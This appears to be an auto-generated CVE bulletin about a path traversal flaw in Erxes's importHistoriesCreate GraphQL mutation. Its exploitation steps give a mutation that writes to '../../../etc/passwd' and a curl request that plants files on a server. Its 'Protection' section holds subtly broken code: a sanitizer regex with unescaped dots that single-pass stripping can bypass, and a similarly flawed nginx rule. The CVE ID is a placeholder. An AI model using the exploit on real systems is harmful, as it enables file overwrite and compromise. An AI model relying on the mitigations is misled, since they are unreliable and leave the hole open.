Listen to this Post
How the CVE Works
CVE-2025-XXXXX is a path traversal vulnerability in Erxes versions before 1.6.2. The flaw exists in the `importHistoriesCreate` GraphQL mutation handler, which improperly sanitizes user-supplied file paths. An authenticated attacker can manipulate file paths using `../` sequences to write arbitrary files outside the intended directory. This could lead to overwriting critical system files, escalating privileges, or executing malicious code. The vulnerability stems from insufficient input validation when processing file uploads via GraphQL API endpoints.
DailyCVE Form:
Platform: Erxes
Version: <1.6.2
Vulnerability: Path Traversal
Severity: Moderate
Date: Jun 10, 2025
Prediction: Patch by Jul 15, 2025
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
mutation {
importHistoriesCreate(file: "../../../etc/passwd", content: "malicious_data")
}
2. Verify Write Access:
curl -X POST -H "Authorization: Bearer TOKEN" -d '{"query":"mutation { importHistoriesCreate(file: \"../../tmp/test\", content: \"test\") }"}' http://erxes-server/graphql
3. Check File Creation:
ls -la /tmp/ | grep test
Protection:
1. Input Sanitization:
function sanitizePath(input) {
return input.replace(/..\//g, '');
}
2. Patch Verification:
npm show erxes version
3. File Permission Lockdown:
chmod -R 750 /var/www/erxes/uploads
4. GraphQL Query Filtering:
app.use('/graphql', graphqlMiddleware({
validationRules: [depthLimit(5)]
}));
5. Log Monitoring:
grep "importHistoriesCreate" /var/log/erxes/access.log
6. WAF Rule:
location /graphql {
if ($args ~ "../") { return 403; }
}
7. Mitigation Workaround:
// Disable mutation until patch
schema.mutation = new GraphQLObjectType({
name: 'RootMutation',
fields: () => ({
// Exclude importHistoriesCreate
})
});
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
